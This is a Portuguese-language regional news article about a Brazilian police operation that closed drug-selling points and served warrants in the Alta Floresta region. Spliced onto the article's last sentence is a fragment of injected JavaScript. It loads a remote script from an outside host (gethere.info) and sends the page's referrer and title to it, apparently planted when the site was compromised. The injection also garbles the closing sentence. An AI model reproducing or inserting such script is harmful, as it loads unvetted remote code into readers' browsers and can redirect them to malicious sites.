Capa / Em Destaque / Operação fecha 10 bocas de fumo na Regional de Alta Floresta

Operação fecha 10 bocas de fumo na Regional de Alta Floresta

políciaAssessoria com Redação

Os resultados da ofensiva “Civil na Carga Máxima” também apontam êxitos , até a sexta-feira, 04, foram 10 bocas de fumo fechadas,13 mandados de prisão preventivas cumpridas , 40 buscas realizadas e diversos veículos recuperados ao longo da semana nas cidades de Alta Floresta, Paranaíta, Nova Monte Verde, Nova Bandeirantes e Apiacás.
Os esforços começaram na quarta-feira com o cumprimento de mandados de busca e apreensão e diligências diversas que seguiram ao longo de todo o dia nestes municípios.
A ação é coordenada pelo Delegado de Polícia Marcos Cesar Farias Lyra, titular da unidade policial de Paranaíta, sob a supervisão do delegado regional de Alta Floresta Rodrigo Bastos e envolveu todo o efetivo de investigadores e escrivães das cidades.
“Ações como esta são de extrema relevância no combate à criminalidade uma vez que atua junto ao tráfico ‘formiguinha’, pois tal ilícito além de atingir a saúde pública, fomenta de forma significativa a prática de outros delitos”.
“Civil na Carga Máxima” é o nome da megaoperação desencadeada pela Polícia Judiciária Civil em sintonia à determinação de ofensiva à criminalidade em todo o Estado proposta pela Secretaria de Segurança Pública (Sesp).
O delegado regional Rodrigo Bastos deve apresentar hoje um balanço da operação.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top